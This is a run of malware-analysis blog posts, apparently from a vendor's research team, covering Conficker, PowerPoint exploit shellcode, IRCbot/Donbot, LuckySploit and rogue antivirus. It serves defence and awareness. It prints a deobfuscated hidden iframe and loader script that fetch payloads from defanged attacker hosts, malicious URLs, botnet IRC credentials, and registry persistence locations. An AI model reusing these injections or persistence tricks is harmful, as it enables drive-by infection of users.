Ok, what about second goal I mentioned in the beginning – is it invisible for AV products? Even though it is not polymorphic, a majority of AV vendors, except for a few (not listed here that catch dropped rootkit) do not currently detect the Virus (as of 07/04, as seen in these VirusTotal results):

Btw, this variant of W32/Winemmem keeps all the information necessary to restore original file at the constant offset unencrypted. If you are writing cleaning for this one, check the table located at OEP + 0×159. It contains VA’s and sizes for the stolen bytes.

LuckySploit is an exploit framework that’s been in the news recently. As drive-by-downloads go, it lurks behind iframes and foists malware upon unsuspecting users.

One LuckySploit attack we analyzed downloaded the FakeAlert-BY Trojan. So if you visited a Web site today then saw this…

… then you are, unfortunately, infected with FakeAlert-BY, and possibly thanks to LuckySploit.

We detect the LuckySploit downloader as JS/Downloader-BNL in the 5580 DATs, to be released on April 10. We’ve had detection for FakeAlert-BY  since the 5545 DATs, released on March 6.

Please update your AV signatures and stay secure!

“Artemis” is a McAfee’s new cloud-computing technology that is capable of detecting new malware threats in real time. In the last 48 hours our Artemis Technology detected some malware that it was targeted to certain regions of the world.

In North America, one particular sample was queried by Artemis more than 80 times by more than 60 unique (ISP, not end-point) IP address. This is highlighted in the first figure below by the dispersed nature of the red dots. Artemis has already detected this malware and offers extra protection over the regular DAT files. After further analysis we added detection for this sample in the regular DATs as “Generic.dx” Trojan for Thursday’s DAT release.

This particular sample was seen only in North America. The red dot in the Pacific Ocean covers the islands of Hawaii, while the dot in Europe is from a well-known multi-AV scanner service vendor based in Spain. Presumably the sample was submitted there by someone in America!

Sorry to pick on North America again, but another sample has popped up on our radar. As you can see, we didn’t have automatic protection for this but the various systems analyzing the threat details soon marked this as bad. These systems report that this sample has been seen only through our consumer (VirusScan Online) and SMB (ToPS) products. This sample has now been classified as a Spy-Agent.bw Trojan and will also be included in Thursday’s regular DATs.

Example 1:

Example 2:

McAfee Avert Labs has received a new variant of the infamous Conficker worm. Like the previous variants, this one also spreads using the MS08-067 vulnerability in Microsoft Windows Server Service. But unlike the previous variants, which arrived as a Windows DLL file, this variant seems to arrive as an .EXE file.

Detection for this variant of the worm will be available as W32/Conficker.worm.gen.d from the upcoming 5579 DAT release. Users of McAfee Artemis Technology are already protected in real time against this threat.

We have also updated our stand-alone cleaning tool–Stinger–to detect and clean this variant.

More information on this variant of the Conficker worm is available here. McAfee’s coverage and protection for the MS08-067 vulnerability, is available here.

For measures to protect yourself and your organization against Conficker, please visit:

• http://www.mcafee.com/us/threat_center/conficker.html

We will continue to monitor this threat in our labs, and will update our blog with any new findings.

As a follow-up to my colleagues’ blog post about the newest Office exploits, here is an analysis of one of the Microsoft PowerPoint Zero-Day exploits that once again are used in targeted attacks to infect victims with a trojan horse. The malicious presentation files abuse a new, yet unpatched hole in Microsoft PowerPoint and causes it to execute code infiltrated by the attackers. This blog post shows how the shellcode works and what it does, right after an innocent victim opens the malicious file - if the attacker gets their way of course!

For size reasons, the code is split up into several parts that are scattered among the malicious PowerPoint file. Part one of the shellcode consists of an “egghunter”, which is used to relocate the remaining part of the shellcode in memory. In order to do that, it first sets up an exception handler that prevents crashes when accessing bad memory locations, then goes on a hunt for the shellcode’s prepended egg (0xD1CF11E0). Once that egg (which is a marker for the beginning of the shellcode’s second part) is found in memory, code execution is transfered to the code following it.

Part two of the shellcode begins with a loop that looks for a writable memory block of at least 1KB in size (starting at address 0×30000000). Another loop then XOR decodes another part of the shellcode into that memory location and branches to it. Once decoded, a filename (”fssm32.exe”) can be seen in the disassembly. In order to either download or drop a second-stage executable, shellcode needs access to operating system API functions. The ones it needs are going to be imported by parsing OS internal structures, such as the Process Environment Block, to locate kernel32.dll, then parsing the library’s PE header to locate the desired function pointers.

As shellcode mostly needs to fit into a size-limited block of memory, this piece of exploit not only has its code split into several parts for it to work reliably, it also uses 32bit hashes of API functions to import, rather than a list of respective function names which would consume more space. The shellcode’s ROR-13 hashing algorithm iterates over any exported API function name and compares it against its given list at run-time. Applying the same technique when statically analyzing shellcode, the list of imported functions becomes readable. Looking at the now readable list, it does not contain any function which would indicate the shellcode to download a file but rather drop an embedded one from the PowerPoint file and execute it.

Using a hex-search for typical indicators of an executable file, such as an “MZ” or “PE” header doesn’t yield any feasible results - which is not astonishing at all. Of course, the attackers responsible for having built the exploit intended to prevent their cover being blown by something as obvious as an executable that is embedded into a PowerPoint presentation file! By looking more closely at the shellcode, there is another suspicious XOR-decoding loop.

The loop decrypts a given memory block using an 8bit XOR key. By incorporating the same decryption-loop into a Python script and applying it to the PowerPoint file (see screenshot below), both an MZ- and PE header surface in the hex editor. It’s the embedded executable that was assumed to hide between the PowerPoint “slides” - the malware can finally be extracted.

McAfee VirusScan products detect this threat as Exploit-PPT.k trojan, McAfee Anti-Malware Gateway Edition (former Secure Computing) detects the new exploits as Heuristic.Exploit.OLE2.CodeExec.PGPG.

Microsoft recently reported a new worm found to be exploiting the MS08-067 software flaw in the wild.  Even though our products already detected it generically as W32/IRCbot.gen.a, we decided to take a closer look and make sure we proactively detect all components that the worm might be dropping or downloading.

When run, W32/IRCbot.gen.a copies itself to <system folder>\netmon.exe.  It then drops a rootkit as <system folder>\drivers\sysdrv32.sys (MD5: 0e219b74e2c68a34ca09d8fe114f6d11) and hooks the Windows tcpip.sys driver to remove the outbound connection limits in Windows XP Service Pack 2 and newer. We successfully detect this rootkit as Generic Rootkit.g trojan.  It then follows to establish an outbound connection with a remote IRC server using following credentials:

• PASS h4xg4ng
• NICK [00-USA-XP-9215671]
• USER SP2-ojd, followed by the name of the infected computer.

This worm exploits the MS08-067 vulnerability indeed, and uses a download-and-execute shellcode which behaves in an identical fashion as Conficker’s exploit, with only some differences in implementation. It is encoded using a simple 1-byte XOR key and looks like any other standard PEB shellcode which loads API libraries (i.e. urlmon.dll) and executes URLDownloadToFile() to download malware from already infected systems into new targets. Unlike Conficker which injects a downloaded DLL into running Windows processes, this worm downloads and installs a 66.scr executable file instead.

As mentioned, the Conficker worm uses an exploit derived from the “ms08_067_netapi” Metasploit module to spread itself.  The Metasploit framework has become a popular platform for security tools development and automation. As we can see, the latest version of Metasploit is not only used by whitehatsfor vulnerability assessments and penetration testing, but also for malware development. The W32/IRCbot.gen.a worm is not an exception, it has remote language detection taken from Metasploit’s “smb_fingerprint()” routine implemented in the “smb.rb” module, as well as dcerpc service connection testing code located in the “client.rb” module. By using these routines,  new worm can conveniently determine which operating system and service pack it is targeting to achieve a better infection success rate. The way how W32/IRCbot.gen.a ordered the attack packets is identical to Metasploit’s MS08-067 module  (ms08_067_netapi.rb):

Both Conficker and W32/IRCbot.gen.a uses open source tools similarly to their advantage to make their work much easier.

We went on to investigate additional sites where the worm is connecting to and the payload that it is trying to download. Packet sniffer logs shows that it accesses at least two other remote servers:

• hxxp://98.1[infected].42:443/n
• hxxp://74.2[infected].90:88/jueo.exe

While the first server is not showing any technical activity at the time of research, the second server is still active and hosts additional malware that is installed into infected machines:

Well, hello Donbot ! Upon investigation, the downloaded malware (MD5: 916DB2E2C2D1ED7AF89DD8EBB9C7D84C) detected generically as Generic.dx appears to be a component of an active botnet called Donbot (also known as Bachsoy). Components of Donbot typically create a proxy on infected machines and may be used to relay spam and HTTP traffic. Except for a few, most AV vendors seem to have detection for this malware.

Until recently, Donbot has been a relatively minor player in the lucrative spam business, but it certainly looks like the Donbot authors have decided to expand the potential of their botnet . While other botnets - namely Cutwail and Rustock continue to dominate the distribution of spam, Donbot is making an eager attempt to get a bigger share of the spam revenue pie as one of the top 5 most active botnets worldwide. Clearly, worm authors are focusing on growing their botnets as they might not get another chance like the MS08-067 exploit in a long time.

This would also serve as yet another reminder that there could well be many computers on the Internet that are still not installed with the latest security updates - more than 5 months since the release of the MS08-067 patch.

Have you ever read an article on the web where you just had to Google a certain term or phrase to learn more about it, or even just to satisfy your own curiosity? The answer is likely yes, and it’s probably a frequent occurrence. That’s what malware distributers have figured out. Here’s an example. A news article about disgraced financier Bernard Madoff made mention of his 55-foot yacht; a 1969 Rybovich. Wow, I bet that’s a spectacular yacht. If you wonder what one looks like, perhaps you might do a quick search for “1969 Rybovich.” One may think such a casual search would be harmless. Think again. It turns out Malware distributors have honed in on the yacht phrase and the top Google results are malicious URLs. We first noticed this on the evening of April 1 when we first read the story and were curious - and our first take was “Wow, they are fast”.    We watched the evolution of the number of google results that presented malware over the course of April 2. The last we checked - even one of the blogs off of my.barackobama.com was utilizing this yacht to lure users.

The search results don’t look so threatening, but if you are to click on the first few URLs, you’ll find differently. Each of these URLs is a rouge anti-virus URL that will distribute malware. Here are a couple of examples…

These two examples should arouse suspicion by now, especially if you’re looking for yachts, but anyone acting in haste, or succumbing to further curiosity will be taken to the malware delivery upon clicking where prompted, and frequently it’s already been delivered even if you don’t click.

This example is quite typical of what you’ll see next when you click, a fake malware scan that delivers the malicious goods. It looks just like an MS scanner!!!

So what about that 1969 Rybovich? What about further curiosity based Googling? Next time you find yourself conducting such a search, do so with caution. Consider if the search result URLs all look similar. In this case, that is first red flag of caution. When you click to go to a link; does the content look like what you expected or is there some unexpected prompt to click? This is red flag number two. One shouldn’t even proceed onto red flag number three to see the fake malware scan. Already you’re taking a dangerous path that is not going to show you anything about Madoff’s yacht.

We’ve just seen the Microsoft Excel 0-day attacks in February. Today, Microsoft published a new Security Advisory reporting a new unpatched vulnerability in Microsoft Office PowerPoint.

McAfee Avert Labs investigated and discovered multiple attacks in the field using the PowerPoint exploit. McAfee VirusScan products detects this threat as Exploit-PPT.k trojan using the 5573 DATs to be released on the same day. 

As with most other document exploits, these PowerPoint files install malicious trojans in the background but displays an innocent PowerPoint presentation to the victim as a deceptive measure. The following list shows a variety of malware files installed in these attacks:

• fssm32.exe: 428,032 bytes (Muster.c trojan)
• IEUpd.exe : 45,056 bytes (Muster.c trojan)
• setup.exe : 13, 1072 bytes (Muster.c trojan)
• PeerCM.exe : 80,666 bytes (Generic BackDoor.u trojan)
• ws2_42.dll :10,6740 bytes (Generic BackDoor.u trojan)

Some of these specially crafted exploits arrived as PowerPoint Showfiles with the “.pps” extension. Such files typically opens in full screen mode and hides the  applications running on the desktop such as system monitoring tools that could give any clue to the dodgy installation of trojans to the victim.

Please keep your DAT files up-to-date and refrain from opening any PowerPoint files from any untrusted sources until a patch is made available by the vendor. Where possible, verify with the sender to make sure what you get is what was intended.

A lot has already been written about Conficker. There had been excellent analysis reports published by SRI, The Honeynet Project and others. Vinay Mahadik and I would like to present some findings on the network aspects of the Conficker.C behavior. 

We setup a small testbed that had a machine infected with Conficker.C in a controlled environment; and another Linux box that was customized for packet mangling. This enabled us to intercept or mangle the packets exchanged between the infected machine and the outside world. We monitored the activity of the infected host over several days. We classify the test into two phases: Pre- April 1st and the April 1st phase.

During the Pre- April 1st phase we observed the following.

Conficker.C gets the current time from some of the popular websites. This involves sending a DNS query to the name server to resolve the IP address of the website which is followed by a HTTP GET request to that IP address. The below figure illustrates an attempt made to craigslist.org:

Conficker.C also sends UDP and TCP probes to locate its peers. We observed fairly aggressive and simultaneous UDP & TCP scans. The volume of the UDP scans was particularly high - roughly 2-3 UDP queries per second and seems to taper down as we got closer to April 1st. As most of the randomly generated IP addresses were not live or did not have the targeted ports opened, there were a large number of ICMP messages received – port unreachable , host unreachable, time-to-live exceeded.

“April Fooling Conficker.C”

In the April 1st phase, we intercepted and manipulated the HTTP date check query responses, so that for every website that Conficker.C queries, it gets a response with a date stamp of April 1st, 2009. The local system time was also set to April 1st. By controlling the only 2 date check sources, we managed to fool the malware into thinking it was indeed April 1st! Soon after, we observed numerous DNS queries for the generated domain names.

There were a few instances where Conficker.C did discover peers out there, and exchanged short UDP packets with them over several minutes. We were extremely curious about them.

Vinay Mahadik reverse engineered the 95+ conversations, across some 50K+ UDP peer discovery packets, and found some patterns in both the requests and responses. These patterns are valid for both the pre- April 1st and April 1st UDP scans. Based on this, we have incorporated a new heuristics into our latest Network Security Platform Signature set 5.1.16.15, or 4.1.46.16.

McAfee Network Security Platform (Intrushield) customers can observe the following alerts.

• WORM: W32/Conficker.C Activity Detected
• HTTP: Suspicious Time Check Detected

The figure below illustrates the alert viewer drilled down by a Source IP that has generated the “WORM: W32/Conficker.C Activity Detected ” alert.

 (Both Vinay Mahadik and Ravi Balupari have contributed to this research blog)

Hello, it is now April 1st for at least Asia Pacific and Europe. We’ve been blogging and posting various resources about ways to protect against the Conficker worm up to its “activation day”:

•  “More Comments Regarding Conficker“
•  “W32/Conficker: Much Ado About Nothing?“.

The day has finally arrived.

McAfee Avert Labs has been closely monitoring Conficker-related threats and, we haven’t observed any significant activities on the domains that it is polling for thus far. Even so, please remain vigilant and watch this space for any further updates to the current status.

On measures to protect yourself and your organisation against Conficker, please visit:

• http://www.mcafee.com/us/threat_center/conficker.html

We often see messages from malware authors in the malware that we analyze. And, strangely, unlike the theme of The Police’s hit song “Message in a Bottle,” these are never expressions of love. On the contrary, they’re usually offensive.

Backdoor-DOQ is a backdoor Trojan. A variant that we analyzed last week would, among other things, establish a connection to a remote server via IRC and wait for commands from an attacker on the communication channel. Beyond its nastiness, the Backdoor-DOQ executable contains a message in plain text. I’ve censored the nonfamily friendly pieces of this: “I do voodoo on your mom [expletive]. BTW metal rules pop sucks.”

It’s hardly a love song.

Everyday there are thousands of websites that have been injected with malicious code and there are millions of hosts that have been infected by malware from these malevolent URLs. The main vulnerabilities lately are Windows-based as well as third-party application issues. This blog will introduce the most common vulnerabilities used by malevolent URLs in China throughout 2008.

1. BaoFeng2 Storm
BaoFeng2 Storm is the most powerful media player used in China. The software supports multiple media formats, and its features are easy-to-use, as well as free. Multiple buffer overflow in Baofeng2 Storm allow for the downloading and execution of files. CVE Number is CVE-2007-4816.
Reference:
http://www.baofeng.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4816

2. Baidu Soba
Baidu Soba is a search bar for the Internet that is integrated with a powerful MP3 search, web page search, flash search and so on. Vulnerabilities in the BaiduBar.dll in Baidu Soba have allowed for the download and execution of files via a specific link. According to the vulnerability description, the vulnerability exists in versions prior to version 5.4. CVE Number is CVE-2007-4105.
Reference:
http://bar.baidu.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4105

3. Xunlei Web
Xunlei Web is downloader software. Its GUI control is very browser-like. It’s important to note that people can find more and more valuable resources to download via Xunlei Web, so Xunlei Web has a great deal of customers. Buffer overflows in Xunlei Web before version 5.6.3.44 can execute arbitrary code with the vulnerability. CVE Number is CVE-2007-5064.
Reference:
http://dl.xunlei.com/index.htm
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5064

4. PPStream
PPStream is IPTV software base on p2p streaming techniques. It’s very popular in China. Buffer overflows in the PowerPlayer.dll in PPStream before version 2.0.1.3829 allow for the execution of arbitrary code via the vulnerability. Its CVE number is CVE-2007-4748.
Reference:
http://www.ppstream.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4748

5. OurGame Chat
OurGame is a kind of free game. It is a gaming platform that covers all the related fields and areas of network games. It has a category of nearly one hundred species of games, including Card games, leisure games, large-scale network and so on. Buffer overflows in the GLChat.ocx of the OurGame Chat module in the ConnectAndEnterRoom() method allows for the execution arbitrary code. Its CVE number is CVE-2007-5722.
Reference:
http://www.ourgame.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5722

6. Ultra Star Reader
Ultra Star Reader is an e-book reader tool. It’s similar to a PDF reader. Buffer overflows in the Ultra Star Reader allows for execution of arbitrary code via the vulnerability. Its CVE number is CVE-2007-5807.
Reference:
http://www.ssreader.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5807

7. JetAudio
JetAudio is media player with sound-effect enhancing functionality. Vulnerabilities in the JetFlExt.dll in JetAudio version 7.0.3 allows for the overwriting of arbitrary local files. Attackers can drop malware on a system via this vulnerability. Its CVE number is CVE-2007-4983.
Reference:
http://www.jetaudio.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4983

8. Xunlei Thunder
Xunlei Thunder is free downloader software. It supports multiple download protocols such as http, ftp and bit torrent. Buffer overflows in the pplayer.dll in Xunlei Thunder allow for the execution of arbitrary code. Its CVE number is CVE-2007-6144.
Reference:
http://www.xunlei.com
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6144

There is really no scarcity of spurious security programs. Almost daily, we see programs that pretend to be security programs but in reality are malicious. They display messages about system compromise and attempt to frighten users into purchasing some other malicious program to prevent the compromise. Or worse. While displaying fake messages about system compromise is bad, it’s almost benign when you consider that a rogue antispyware could itself be spyware.

Last week we stumbled upon FakeAlert-AntiSpywarePro. This is a rogue antispyware program. If you’re unlucky enough to run this application, you’ll see a window such as this:

You can run several kinds of system scans with this program. But to what avail? You can’t trust a program that lies to you. FakeAlert-AntiSpywarePro drops a number of files and installs a bunch of registry keys, including a key for a browser-helper object (BHO) for Internet Explorer.

So keep your AV signatures up to date, and say no to FUD seeded by unscrupulous malware authors!

Don’t you like when legit obfuscated javascript is mixed with the malicious one?
Also, don’t you like when the malicious one is linked with several redirection, referrals, exploits and other malwares?

So, here is the story…
Once upon a time a user was checking for a service on google and found one that fits the need…
The site is a innocent (until proved otherwise) website that exists for some years to announce a specific type of service.
The site uses all those fancy (and legit) javascript to give some special effects to the website.

Indeed, real special effects…because when you get in there, all the magic happens…:)

From the user standpoint, he just went to the website, lets call it specialeffectsservices.domain, and suddenly his machine is owned, and the AV starts to pop up with alerts…

A more closer view reveals what happened:
Among all .js file on the website, there is one that besides the regular fancy javascript, there was one not so innocent…

The script was obfuscated with the known (p,a,c,k,e,d) function.

I managed to deobfuscated and found the following iframe:
[iframe width=1 height=1 src='hXXp://[REMOVED]-atm.net/b2b/’style=’display:none’ > ></iframe]

If you go to [REMOVED]-atm.net website, you will find the nice message:

H@K3D 8Y J@KE-M1L

If you go to [REMOVED]-atm.net/b2b you will be redirected to files[REMOVED].net

The files[REMOVED].net also contains a folder called b2b with another obfuscated script (which you are only able to see with the right referral):

[SCRIPT LANGUAGE="JavaScript"]
function spl(){var
crypted=”60!83!99!114!105!112!116!32!76!97!110!103!117!97!103
!101!61!39!74!97!118!97!83!99!114!105!112!116!39!62!13!10!98!111!102!40!
41!59!32
.
.
.
3!125!125!32!13!10!60!47!83!99!114!105!112!116!62!”;var
i,out=”",temp=”",c=0;l=crypted.length;do{while(crypted.charAt(c)!=’!')temp=temp+crypted.charAt(c++);c++;
out=out+String.fromCharCode(temp);temp=”";}while(c<=crypted.length-1);document.write(out);}
spl();
[/SCRIPT]

When I finally were able to deobfuscate it, it was possible to see that it was leading to even another redir, in the same site,as you can see:

q.open(’GET’,'hXXp:// files[REMOVED].net/b2b/load/’,0);

The /load folder will push a PE file to user’s machine, on c:\ usually with a name T.exe .

Of course it does not stop there…:)

The T file is a downloaders, which will then download 2 additional files from the same domain plus another one from hansali[REMOVED].com

As an additional information, files[REMOVED] is the C&C from the malware installed.

And yes, we detect them all…:)

A lot has been published about Conficker already–this blog is an addendum to our previously published “W32/Conficker: Much Ado About Nothing.” Here we offer some Conficker snippets, if you will.

First off, you may be confused by the differences between the a, b, and c variants. Let’s clear this up a bit. The Conficker.worm.a and Conficker.worm.b variants use the MS08-067 vulnerability in Microsoft’s Server Service for propagation. The latest variant, Conficker.worm.c, has included significantly updated functionality. This update, while complex and clever, was performed on Conficker.worm.a and Conficker.worm.b infections–meaning that the exploit was not included in the update’s payload. SRI International has a good write-up about this as well as other technical details. (Note: You’ll get a patch you wish you didn’t get!)

The next thing you probably want to know–and what’s probably most important to you when dealing with this–is how are you going to combat this threat? Riding to the rescue we see Avert Labs Services. They have published a practical “in the trenches” document to help you identify and combat the infection.

But beyond anti-malware protection, what else can you do?

The best way is to prevent initial, or further, infection. If you have the latest variant, you were most probably hit by the Conficker.worm.a or Conficker.worm.b variants. McAfee VirusScan or our standalone Stinger utility are useful tools. If you also have a vulnerability manager and host/network IPS you may have other avenues to explore. These tools could allow you to detect any missing MS08-067 patches, prevent code execution in the event of a buffer overflow, or detect traffic from the Conficker.worm.a and Conficker.worm.b over the wire. These steps could help you shut the door on the initial infection vector. In fact, the combined additional coverage when using McAfee (formerly Foundstone) Vulnerability Manager, McAfee Host Intrusion Prevention (formerly Host IPS), and McAfee Network Security Platform (formerly IntruShield) would give you four checks, and four signatures plus generic buffer overflow protection. That’s great additional firepower.

Another good resource? The page you are currently visiting. We’ll be sure to update you as things progress.

=== Update March 31, 2009, 7pm PDT ===

It’s already April 1 in many parts of the world. And, thankfully, so far it’s been quiet on the Conficker front. If you’re scrambling to check for Conficker infection on your systems, then check out our Conficker Detection Tool. Also, remember to keep your product signatures updated!

In the run-up to April 1, the media spotlight around the latest Conficker worm variant has reached a morbid frenzy. From being touted as an “April Fool’s joke” to outrageous headlines such as “Millions of computers expected to be destroyed”–no other worm in recent history has generated this much media attention. But what have we learned from history? From the days of Michelangelo to the recent Blaster, SoBig, Sober, and Kamasutra worms, the hype surrounding the activation or payload dates of major Internet worms have turned out to be only damp squibs.

What happens on April Fool’s Day is anyone’s guess. Although we still don’t know the real intent of the authors of the Conficker worm, they have consistently improved the worm by adding new functionality and anti-debugging tricks with every released variant. In order to resist the Conficker Cabal initiative, which recently blocked domain registrations associated with previous Conficker A and B variants, the worm authors upped the randomly generated domain count from 250 to 50,000. The intent behind generating and attempting to contact so many domains is to make it extremely difficult for security researchers to monitor sites that could potentially host a payload for the Conficker worm to download and execute.

What we do know is almost all the security vendors have thoroughly analyzed Conficker–also known as Downadup and Kido worm–and have good generic detection and cleaning in place. Uploading a couple of randomly selected Conficker binaries to the VirusTotal site consistently shows an overall anti-virus detection rate of 90 percent or above. And these high detection rates are across vendors–small or big.

To prepare for any trouble on April 1, McAfee now offers a special build of its standalone cleaning tool Stinger, which will be updated on a daily basis to include any undetected Conficker variants from the wild. This special build of Stinger can be downloaded from the Avert Tools site. We’ve also posted detailed documentation on mitigation steps that security staff within organizations can take to combat W32/Conficker. Additional McAfee product coverage information for MS08-067–the Microsoft Windows Server Service vulnerability, which is exploited by the worm–can be viewed at the McAfee Threat Center.

Please ensure that your copy of Microsoft Windows is patched and your security software is fully up to date. That way you won’t end up an April Fool.

You already know that malware changes registry keys to take advantage of the autorun capability when systems and applications start. The registry keys we often see for this purpose include:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Current Version\Windows\AppInit_DLLs
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[Legit_program]\Debugger
HKEY_CLASSES_ROOT\CLSID\[CLSID]\InprocServer32

Recently, we noticed that the Lando Trojan uses a different registry to load its malicious code into Internet Explorer. By dropping a fake sound driver (wdmaud.sys) into the %system32% folder and by adding the registry key HKEY_LOCAL_MACHINE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux2: “%system32%\wdmaud.sys,” the malware author injects malicious code into the iexplore.exe process. When the user launches Internet Explorer, the attacker hijacks Google search.

How can you distinguish the real sound driver from the fake? The legitimate wdmaud.sys is a component of Microsoft’s WDM driver or WINMM WDM Audio Compatibility driver. You’ll find it in the %system32%\drivers\ folder. It is about 84KB and includes complete version information.

Meanwhile the malicious wdmaud.sys is located in the %system32%\system32 folder. It is only about 22KB and has no version information.

By comparing their file properties, you can easily tell the difference. But, as always, be careful when deleting the malicious wdmaud.sys or other suspicious files. You don’t want to trash the legitimate driver.

Computer users know that they shouldn’t touch system files. If they did, they could damage their computers. A well-known ploy of malware authors is to name their files after system files. Users can be tricked into ignoring malicious files on their systems by this social-engineering method.

Let’s look at what the Backdoor-CEP.gen Trojan does, for example. When a user is infected with this Trojan, its drops the file server.exe into the user’s system directory:

Like many system files, server.exe is hidden. Now how many users would take a second look at server.exe in their system32 folders? Unfortunately, server.exe is a backdoor that waits for and responds to commands from remote attackers. As always, users should exercise caution when dealing with executables of unknown origin. For more about the Backdoor-CEP.gen family, check out its VIL page.

I ran across a new twist on the by-now well known FakeAlert series. Just in case you have been lucky enough not to have dealt with this malware, it goes roughly like this:

You get an email from what looks to be a legitimate source, or visit a legitimate looking website that is offering the latest must-have application or upgrade. “This thing looks cool”, you think as you happily ignore your IT security friend’s advice against following unsolicited or potentially unsafe links. “Someone must really like me to be sharing this with me”.

So you continue to download the ‘treasure’. Then when you try to install it, it pops up an error - something about being corrupt and the installation cannot proceed. Seconds later, you find that some ‘nice’ company has put an antivirus scanner on your computer and begins to scan it for you. You find out that you are loaded with all kinds of nasty stuff and because nothing in life is free, you have to pony up the money to have your computer cleaned.

Problem is, you may not have had these infections in real life. Except, of course, the one you downloaded and installed yourself. This is but one scenario of the fake antivirus scourge.

So the new twist is that your favorite audio or video application may now assist in this nefarious sale. When you install this application, you will actually see things ‘happening’. You won’t be happily working away listening to the latest pop sensation when this gets loaded. The malware will actually stop your multimedia application and drop your volume to zero. It will likewise prevent you from attempting to restart it. You will start to get more and more ominous warnings about your audio and video codecs being corrupted until your entire desktop background is replaced with a giant ‘Your system is melting down and the world is coming to an end - just click here and we will help you fix it’ message (author’s note: it’s not that dramatic, but you get the idea). Of course to ‘fix’ it, it will cost you.

That said, be careful of this scam. We all would like to whistle while we work, but this may have you singing a different tune (sorry, couldn’t resist the sappy line).

More technical information is available here:
FakeAlert-MCodec

McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

UPDATE MARCH 17th

Apologies for the busted links yesterday. All seem to be resolving fine now.

Last week I blogged about how the community forum of Democrats.org was being abused to help manipulate Google’s search results; to lead people to malware.  It appeared that by the end of last week, Democrats.org began the cleanup process of removing all the bogus posts, which seems to have been completed as of this time.  Google’s cache shows that other popular sites were hit as well, including my.barackobama.com and Microsoft’s silverlight.net, which were cleaned up sometime before the end of last week.

In looking a little more at the spammed phrases, it appears as though there are likely multiple groups behind these attacks, perhaps with different agendas.   Some of this is obvious from the formatting of the spam.  The terms themselves also vary, some appear in more dictionary style, while others are more focused on current events, and others still are rather uncommon.  The uncommon terms (including typos) lead me to speculate that at least some terms originated from compromised systems.  There may be a circular nature to this, where unsuspecting victims become infected with one piece of malware, only to have their search terms harvested, analyzed, and subsequently used to entice other victims, but again this is speculation at this point.

Windows offers the useful option of “Safe Mode” to recover from any damage caused by various malfunctions in the system. Booting in Safe Mode loads limited drivers and services that are required for the basic operation of the system, but avoids adding many extras that complicate the environment. In general, Safe Mode is very helpful in recovering the system from malware infections. However, malware can exploit this feature by loading in Safe Mode, thus creating great difficulties for users and administrators in recovering from these infections.

The services and drivers that load in Safe Mode are listed under the following registry key(s):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network

If malware gains control of the system, it can add its entry under the above key(s) to load during a Safe Mode boot. This type of malware is difficult to remove manually; you’ll need an anti-virus product to detect and clean such malware.

Always practice “safe surfing,” which is the first step in keeping your computers clean, and keep your anti-virus signatures updated.

One month ago, my colleague Marius Van Oers posted a blog to announce the number of drivers in our DATs passed 500,000. Today, at McAfee reached another record: We received our twenty-millionth malware sample.

In about 22 years, from 1986 to March 2008, 10 million samples piled up in our collection. In just the last 12 months, however, from March 2008 to March 2009, this figure doubled. This pace represents 27,000 samples in a day, or 1,100 each hour.

These figures demonstrate that real-time response is more vital than ever. But it is not sufficient. Faced with such quantity, researchers have to innovate to create sophisticated heuristic detections. And a third need is a multidisciplinary response: Research teams devoted to host intrusions, network intrusions, and ethical vulnerability disclosure also have to play an important part in this battle. As a global research team, McAfee Avert Labs is able to take up the challenge. I’ll just wish “good luck” to all my colleagues.

During the last couple of years we have seen malware authors increasingly incorporate the autorun.inf infection vector into malware families–with stunning success. In addition to traditional autorun worms that use this feature, pure-play backdoors, bots, password stealers, and even parasitic viruses that previously required a user to click on an executable file to infect the system have incorporated this technique. While the autorun functionality in operating systems does provide some convenience (it saves a couple of clicks), it has single-handedly revived the 1980s model of hand-carried malware propagation.

Two prolific parasitic virus families that have incorporated this infection vector are W32/Sality and W32/Virut. When a removable drive is inserted into an infected machine, the W32/Sality virus infects Microsoft Notepad or Minesweeper and copies it onto the removable drive. The infected notepad.exe or winmine.exe file is renamed with a random .pif or .scr extension and is accompanied with an obfuscated autorun.inf. Below you’ll see a code snippet and the accompanying autorun.inf file.

Even if the removable drive is cleaned of the virus infection, the random namely Microsoft executable would still exist on the drive. Although benign, the leftover remnants would cause some degree of confusion about the origin of the file. Especially since it’s a renamed Microsoft file with a .pif or .scr extension!

The W32/Virut virus is also known to copy infected notepad.exe files to removable drives. Both these virus families are a royal pain in the posterior to clean. This technique provides a resourceful way for them to reinfect hosts even after cleanup.

The other day I blogged about Google Trends being abused to serve malware.  The attackers were not only targeting the most popular search terms, but also manipulating Google’s page rankings to appear high up on search results.  It appears that Google may have squashed those attacks, at least at the moment.

The pages that were coming up while searching Google seem to be purged from Google’s index.  The pages may still be found on other search engines, though not ranked as high.  This is also visible in stats I started gathering yesterday.

